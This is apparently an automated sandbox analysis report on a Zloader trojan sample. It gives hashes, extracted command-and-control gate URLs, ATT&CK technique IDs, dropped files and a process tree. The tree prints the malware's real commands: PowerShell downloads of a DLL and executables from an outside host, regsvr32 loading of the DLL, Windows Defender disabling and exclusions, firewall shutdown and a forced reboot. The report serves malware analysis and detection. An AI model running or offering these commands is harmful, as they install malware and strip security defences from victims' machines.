zloader | 06f39b7745fc370b817fc6f4ba226ac2f39994bf7da7296a99feb68d730ed174

Analysis

max time kernel
52s
max time network
132s
platform
windows10_x64
resource
win10v20210410
submitted
05-08-2021 14:35

Sharing

Copy URL

Twitter E-mail

Reason

Remote task has failed: Machine shutdown

Report Analysis Logs

General

Target

5f4069c9716193f3592946f168f459db.exe
Size

165KB
MD5

5f4069c9716193f3592946f168f459db
SHA1

e16fe562704106b55d40c3f6525dd1a56a5f5df9
SHA256

06f39b7745fc370b817fc6f4ba226ac2f39994bf7da7296a99feb68d730ed174
SHA512

88118e51ec79694f0b95be723342088e10bf37e72482a1bc1712f1bc529ab1f0a9b447172793b3be1e099ca82b8fbc9c1c07b9f7d690f3a04ad94b666e4bc33c

Score

10^/10

zloader vasja vasja botnet evasion persistence trojan

Malware Config

Extracted

Family

zloader

Botnet

vasja

Campaign

vasja

https://iqowijsdakm.com/gate.php

https://wiewjdmkfjn.com/gate.php

https://dksaoidiakjd.com/gate.php

https://iweuiqjdakjd.com/gate.php

https://yuidskadjna.com/gate.php

https://olksmadnbdj.com/gate.php

https://odsakmdfnbs.com/gate.php

https://odsakjmdnhsaj.com/gate.php

https://odjdnhsaj.com/gate.php

https://odoishsaj.com/gate.php

rc4.plain

rsa_pubkey.plain

Signatures

Zloader, Terdot, DELoader, ZeusSphinx
Zloader is a malware strain that was initially discovered back in August 2015.
trojan botnet zloader
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

8 1816 powershell.exe
Downloads MZ/PE file
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Loads dropped DLL 1 IoCs

Processes:

regsvr32.exe

pid process

2296 regsvr32.exe

flow	pid	process
8	1816	powershell.exe

pid	process
2296	regsvr32.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

5f4069c9716193f3592946f168f459db.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce	5f4069c9716193f3592946f168f459db.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	5f4069c9716193f3592946f168f459db.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exe

pid process

1816 powershell.exe
1816 powershell.exe
1816 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 1816 powershell.exe

pid	process
1816	powershell.exe
1816	powershell.exe
1816	powershell.exe

description	pid	process
Token: SeDebugPrivilege	1816	powershell.exe

Suspicious use of WriteProcessMemory 9 IoCs

Processes:

5f4069c9716193f3592946f168f459db.execmd.exeregsvr32.exe

description	pid	process	target process
PID 3176 wrote to memory of 1068	3176	5f4069c9716193f3592946f168f459db.exe	cmd.exe
PID 3176 wrote to memory of 1068	3176	5f4069c9716193f3592946f168f459db.exe	cmd.exe
PID 1068 wrote to memory of 1816	1068	cmd.exe	powershell.exe
PID 1068 wrote to memory of 1816	1068	cmd.exe	powershell.exe
PID 1068 wrote to memory of 3276	1068	cmd.exe	regsvr32.exe
PID 1068 wrote to memory of 3276	1068	cmd.exe	regsvr32.exe
PID 3276 wrote to memory of 2296	3276	regsvr32.exe	regsvr32.exe
PID 3276 wrote to memory of 2296	3276	regsvr32.exe	regsvr32.exe
PID 3276 wrote to memory of 2296	3276	regsvr32.exe	regsvr32.exe

C:\Users\Admin\AppData\Local\Temp\5f4069c9716193f3592946f168f459db.exe
"C:\Users\Admin\AppData\Local\Temp\5f4069c9716193f3592946f168f459db.exe"
1⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:3176

C:\Windows\SYSTEM32\cmd.exe
cmd /c start.bat
2⤵
- Suspicious use of WriteProcessMemory
PID:1068

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Invoke-WebRequest https://cmhxwbkplijrlvswubai.com/JavaE.dll -OutFile JavaE.dll
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1816

C:\Windows\system32\regsvr32.exe
regsvr32 JavaE.dll
3⤵
- Suspicious use of WriteProcessMemory
PID:3276

C:\Windows\SysWOW64\regsvr32.exe
JavaE.dll
4⤵
- Loads dropped DLL
PID:2296

C:\Windows\SysWOW64\msiexec.exe
msiexec.exe
5⤵
PID:3688

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Invoke-WebRequest https://cmhxwbkplijrlvswubai.com/nsudo.bat -OutFile nsudo.bat
3⤵
PID:3280

C:\Windows\system32\cmd.exe
cmd /c nsudo.bat
3⤵
PID:1072

C:\Windows\system32\cacls.exe
"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
4⤵
PID:1864

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Invoke-WebRequest https://cmhxwbkplijrlvswubai.com/javase.exe -OutFile javase.exe
4⤵
PID:2152

C:\Users\Admin\AppData\Roaming\javase.exe
javase -U:T reg add "HKLM\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d "1" /f
4⤵
PID:3828

C:\Users\Admin\AppData\Roaming\javase.exe
javase -U:T sc config WinDefend start= disabled
4⤵
PID:2332

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionProcess '"C:\Users\Admin\AppData\Roaming'"
4⤵
PID:700

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Add-MpPreference -ExclusionProcess "regsvr32""
4⤵
PID:2824

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Add-MpPreference -ExclusionProcess ".exe""
4⤵
PID:1912

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Add-MpPreference -ExclusionProcess "iexplorer.exe""
4⤵
PID:1608

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Add-MpPreference -ExclusionProcess "explorer.exe""
4⤵
PID:2184

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Add-MpPreference -ExclusionProcess ".dll""
4⤵
PID:748

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "netsh advfirewall set allprofiles state off"
4⤵
PID:2356

C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
5⤵
PID:784

C:\Windows\system32\shutdown.exe
shutdown.exe /r /t 00
4⤵
PID:3088

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Restart-Computer
4⤵
PID:2892

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x0 /state0:0xa3acd855 /state1:0x41c64e6d
1⤵
PID:1216

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
MD5
56efdb5a0f10b5eece165de4f8c9d799

SHA1
fa5de7ca343b018c3bfeab692545eb544c244e16

SHA256
6c4e3fefc4faa1876a72c0964373c5fa08d3ab074eec7b1313b3e8410b9cb108

SHA512
91e50779bbae7013c492ea48211d6b181175bfed38bf4b451925d5812e887c555528502316bbd4c4ab1f21693d77b700c44786429f88f60f7d92f21e46ea5ddc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
94ed0a01934f82fea0aaf82f6e8d41aa

SHA1
9aba2fa1d8b468b9e2ebeecf67cfa944ca3f398d

SHA256
cfa7ea578f4f0043858601dd32959c26d4eba54187905855f13faaa4842d7088

SHA512
4120cfcfa34bba8038ec088c820c6be97091c6504a5877d4e6b44d1a4ee2db405ee1f5597ba6c28bf12449c793e681bcf2c797533fcd8e01a8137f216057360c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
a288db95e98d350d8ad2370cf70338d8

SHA1
aec8f1aedc446c705d7fe4c4eb8528e1a9a2ee55

SHA256
5516996826d1372a279df193848029ab5acf508630c2081a5bd61db82319217e

SHA512
7d3430d5e1d79ff92efe6d701cd8a9e3a6002505db9d566bcaac7546ab430a51b2f7bb3b60dcec673fa20eb3db24efb463ff32a5a4d529a5214222e0398cef11

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
e7e8e839e4a15e9b6fe284bb8735c7b4

SHA1
b33d63a192a8fe1146be7b690ccd6bb798a05da7

SHA256
d6653cb18eb51cc5362e442f01e4207130e5b1185d99910a31ea6927722c53cb

SHA512
3f80e00e9e4bdf7b54e2b4d30dc87bc56d4743858f8e938c0bd54ec21cd6b8fcfed1969b68fb920a5a1e4b4d455dab5bf960031467ded1e85ec7916b4fcd7c42

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
31c39de806953b97401496e59e982c38

SHA1
eec7ab1eed02eedaad6023ec4d55283694f3e899

SHA256
daab19ce1c28494e938451df3281291a727201a3bc0332c69e65431052df9d7b

SHA512
50b9067f4cf74564595401ca81bdce587248467d77462c0848ef4175d1eb8561cc22b9d300cb095984d9ccfed0fe55d41b4fbadd22addcbb7a5709b3732cd26b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
9adf51a3ad1fd7ec86f14466025556d2

SHA1
8c5c70166997467115e4fc5ab177184d6cf96855

SHA256
8aba972119e2408f862443acc84473a9e34e2624a3d54be62667f47576e341eb

SHA512
7387fde1535efcdd7e93274945fb7197e9ca7172deaab6f7676ecc74c657b2147d63587400c31ec17b623efcb5668277da434da01b4fe7e52c35d39b49c43438

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
16c0f5e1d6a2b9c5384213d563183070

SHA1
46855ac7a053d77ade458da8d05d2301a11985d8

SHA256
8de772468af07ed5bc170f5a4f8c64612aa48a27e5aa93118088806dfc9608e5

SHA512
f0c73cd34d292f1769ada7910a6834073ae4eeb4c949005d95ddaa98cfd2b268f4f8eb9c409ad71a1c83b268fe47f601f2e0f819765bfa8d2fad941526c6aa0d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
bb2087bb8dd0fb6f3d7ea0ffeccf914d

SHA1
6123d537e32f634b9ad58c4b9c16fb11c77b1aff

SHA256
ff6751a45a4ad039cf0927816b55384ebee583838948f4a4b3db11ff9fc75328

SHA512
597017885fe560ea2e9189be761d25c5b509f6d4b89984f625b02dc583aa98206f996a70d40889adf48f6725a47a6bce19faffa4c70e5c4c653ff09982a4690c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
f0b34dca517910c11a9b4478338d4c18

SHA1
72aaf3a8deb58ae6f90e3aaf31e720cb74caf34a

SHA256
c379c164a17d96cb072b9e4ec2b6fad6fb908b68c6cb0a4a326839d542c05e03

SHA512
04b5d83e0aa54e8c9f4517a8ca00e5cf8b9891e00b63db10660a66107b72eaf1e648f96f6dd78621cdc9509267a287cbf2b20c085b63b04bca1a76c3491cd88b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
1a6ded7478b28c2474d0cacbaeb89f50

SHA1
70d52d809c766077b7f6213ecca20dbb70f6a046

SHA256
dc4d0b7cd2259a809e013d14c331dc895f261a3162f75676fbea96c056d787c8

SHA512
d1a5b4ce8a514ca2edb48fcb84d60ec884afc2604ae68eb6feb7a4c0e62e40d70a9f51e41aa8fe4412b291ce7cde43c0794855235b23570a63f17d86dcaae9f4

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\start.bat
MD5
39e9fef482c45f0458533569592fd548

SHA1
da0da4f4154a45f475a86b8b2c194a779759c6e6

SHA256
1c089f10e4ec48154d653ebed9fae458a09bf00c0b67bfddc37793043872a749

SHA512
f9e732b788e19c0f76163d5a037630de3b59c89ee8b136500e0ff6788a01f03fcf0dbc446f892f89315ef435a94c99b997f42aa06c2bb374cc9e43af09e26e7c

Download Submit
C:\Users\Admin\AppData\Roaming\JavaE.dll
MD5
86cef6c066a05b3f67123fbf638b6b01

SHA1
81618f8ecc48541c219aa974e4b16cab8f34203b

SHA256
86c37d778f584a2a3090ab170c8cd2fb3ddf952cde689b4c5a1efd74fc113a05

SHA512
1132f94eeb8ae5d4556841976789b648f2394a4089db2e6b43c2047cc87004f00e334e14a96c5ab0535aeb13f3bffc8d5e955d7435b9be2aba491bcbe92044d9

Download Submit
C:\Users\Admin\AppData\Roaming\javase.exe
MD5
5cae01aea8ed390ce9bec17b6c1237e4

SHA1
3a80a49efaac5d839400e4fb8f803243fb39a513

SHA256
19896a23d7b054625c2f6b1ee1551a0da68ad25cddbb24510a3b74578418e618

SHA512
c8e54c92133ba686238ea554c1cd82ba441db5fd4b0cbd5082d5eb4ddfcedd15506b9dac553459d0b2221c75778241f926ed3eef64571e4b1e0eb6f80ff9b481

Download Submit
C:\Users\Admin\AppData\Roaming\javase.exe
MD5
5cae01aea8ed390ce9bec17b6c1237e4

SHA1
3a80a49efaac5d839400e4fb8f803243fb39a513

SHA256
19896a23d7b054625c2f6b1ee1551a0da68ad25cddbb24510a3b74578418e618

SHA512
c8e54c92133ba686238ea554c1cd82ba441db5fd4b0cbd5082d5eb4ddfcedd15506b9dac553459d0b2221c75778241f926ed3eef64571e4b1e0eb6f80ff9b481

Download Submit
C:\Users\Admin\AppData\Roaming\nsudo.bat
MD5
f539a64148825dfd117cb30426cdd1b8

SHA1
346396b89f44b8696a6da5be818e1b4d23bd4f9e

SHA256
80bf27664a28a2f00927320b78dc31363584427a8dd6f9de2145ee5dbd80f324

SHA512
4091ff3218cad34577198ede5b5dbd027bc0278bd851766137c1e22f3404838baa22815e5a3d65ef24f923ab067050a8bf2dce36fa9076f49818cd9cf5c7d7c4

Download Submit
\Users\Admin\AppData\Roaming\JavaE.dll
MD5
86cef6c066a05b3f67123fbf638b6b01

SHA1
81618f8ecc48541c219aa974e4b16cab8f34203b

SHA256
86c37d778f584a2a3090ab170c8cd2fb3ddf952cde689b4c5a1efd74fc113a05

SHA512
1132f94eeb8ae5d4556841976789b648f2394a4089db2e6b43c2047cc87004f00e334e14a96c5ab0535aeb13f3bffc8d5e955d7435b9be2aba491bcbe92044d9

Download Submit
memory/700-203-0x0000000000000000-mapping.dmp

Download
memory/700-218-0x0000021E1E690000-0x0000021E1E692000-memory.dmp

Filesize
8KB

Download
memory/700-219-0x0000021E1E693000-0x0000021E1E695000-memory.dmp

Filesize
8KB

Download
memory/700-220-0x0000021E1E696000-0x0000021E1E698000-memory.dmp

Filesize
8KB

Download
memory/748-459-0x000001E93C918000-0x000001E93C919000-memory.dmp

Filesize
4KB

Download
memory/748-425-0x000001E93C910000-0x000001E93C912000-memory.dmp

Filesize
8KB

Download
memory/748-449-0x000001E93C916000-0x000001E93C918000-memory.dmp

Filesize
8KB

Download
memory/748-412-0x0000000000000000-mapping.dmp

Download
memory/748-426-0x000001E93C913000-0x000001E93C915000-memory.dmp

Filesize
8KB

Download
memory/784-469-0x0000000000000000-mapping.dmp

Download
memory/1068-114-0x0000000000000000-mapping.dmp

Download
memory/1072-172-0x0000000000000000-mapping.dmp

Download
memory/1608-361-0x000001E826606000-0x000001E826608000-memory.dmp

Filesize
8KB

Download
memory/1608-328-0x0000000000000000-mapping.dmp

Download
memory/1608-341-0x000001E826600000-0x000001E826602000-memory.dmp

Filesize
8KB

Download
memory/1608-343-0x000001E826603000-0x000001E826605000-memory.dmp

Filesize
8KB

Download
memory/1608-373-0x000001E826608000-0x000001E826609000-memory.dmp

Filesize
4KB

Download
memory/1816-125-0x000001B341560000-0x000001B341561000-memory.dmp

Filesize
4KB

Download
memory/1816-132-0x000001B341656000-0x000001B341658000-memory.dmp

Filesize
8KB

Download
memory/1816-131-0x000001B341653000-0x000001B341655000-memory.dmp

Filesize
8KB

Download
memory/1816-130-0x000001B341650000-0x000001B341652000-memory.dmp

Filesize
8KB

Download
memory/1816-122-0x000001B329040000-0x000001B329041000-memory.dmp

Filesize
4KB

Download
memory/1816-116-0x0000000000000000-mapping.dmp

Download
memory/1864-174-0x0000000000000000-mapping.dmp

Download
memory/1912-286-0x0000000000000000-mapping.dmp

Download
memory/1912-303-0x000001DCFB763000-0x000001DCFB765000-memory.dmp

Filesize
8KB

Download
memory/1912-305-0x000001DCFB766000-0x000001DCFB768000-memory.dmp

Filesize
8KB

Download
memory/1912-301-0x000001DCFB760000-0x000001DCFB762000-memory.dmp

Filesize
8KB

Download
memory/1912-326-0x000001DCFB768000-0x000001DCFB769000-memory.dmp

Filesize
4KB

Download
memory/2152-175-0x0000000000000000-mapping.dmp

Download
memory/2152-181-0x0000021E73A20000-0x0000021E73A22000-memory.dmp

Filesize
8KB

Download
memory/2152-182-0x0000021E73A23000-0x0000021E73A25000-memory.dmp

Filesize
8KB

Download
memory/2152-194-0x0000021E73A26000-0x0000021E73A28000-memory.dmp

Filesize
8KB

Download
memory/2184-369-0x0000000000000000-mapping.dmp

Download
memory/2184-375-0x000002B8F5E03000-0x000002B8F5E05000-memory.dmp

Filesize
8KB

Download
memory/2184-410-0x000002B8F5E08000-0x000002B8F5E09000-memory.dmp

Filesize
4KB

Download
memory/2184-409-0x000002B8F5E06000-0x000002B8F5E08000-memory.dmp

Filesize
8KB

Download
memory/2184-377-0x000002B8F5E00000-0x000002B8F5E02000-memory.dmp

Filesize
8KB

Download
memory/2296-139-0x0000000000000000-mapping.dmp

Download
memory/2296-141-0x0000000002B00000-0x0000000002B01000-memory.dmp

Filesize
4KB

Download
memory/2296-142-0x0000000010000000-0x0000000010148000-memory.dmp

Filesize
1.3MB

Download
memory/2332-201-0x0000000000000000-mapping.dmp

Download
memory/2356-453-0x0000000000000000-mapping.dmp

Download
memory/2356-460-0x0000026F234C0000-0x0000026F234C2000-memory.dmp

Filesize
8KB

Download
memory/2356-473-0x0000026F234C6000-0x0000026F234C8000-memory.dmp

Filesize
8KB

Download
memory/2356-461-0x0000026F234C3000-0x0000026F234C5000-memory.dmp

Filesize
8KB

Download
memory/2824-248-0x0000014104A00000-0x0000014104A02000-memory.dmp

Filesize
8KB

Download
memory/2824-281-0x0000014104A06000-0x0000014104A08000-memory.dmp

Filesize
8KB

Download
memory/2824-244-0x0000000000000000-mapping.dmp

Download
memory/2824-250-0x0000014104A03000-0x0000014104A05000-memory.dmp

Filesize
8KB

Download
memory/2824-284-0x0000014104A08000-0x0000014104A09000-memory.dmp

Filesize
4KB

Download
memory/2892-472-0x0000000000000000-mapping.dmp

Download
memory/3088-471-0x0000000000000000-mapping.dmp

Download
memory/3276-137-0x0000000000000000-mapping.dmp

Download
memory/3280-167-0x000001FD56376000-0x000001FD56378000-memory.dmp

Filesize
8KB

Download
memory/3280-146-0x0000000000000000-mapping.dmp

Download
memory/3280-156-0x000001FD56370000-0x000001FD56372000-memory.dmp

Filesize
8KB

Download
memory/3280-157-0x000001FD56373000-0x000001FD56375000-memory.dmp

Filesize
8KB

Download
memory/3688-143-0x0000000000000000-mapping.dmp

Download
memory/3688-155-0x0000000003250000-0x0000000003276000-memory.dmp

Filesize
152KB

Download
memory/3828-199-0x0000000000000000-mapping.dmp

Download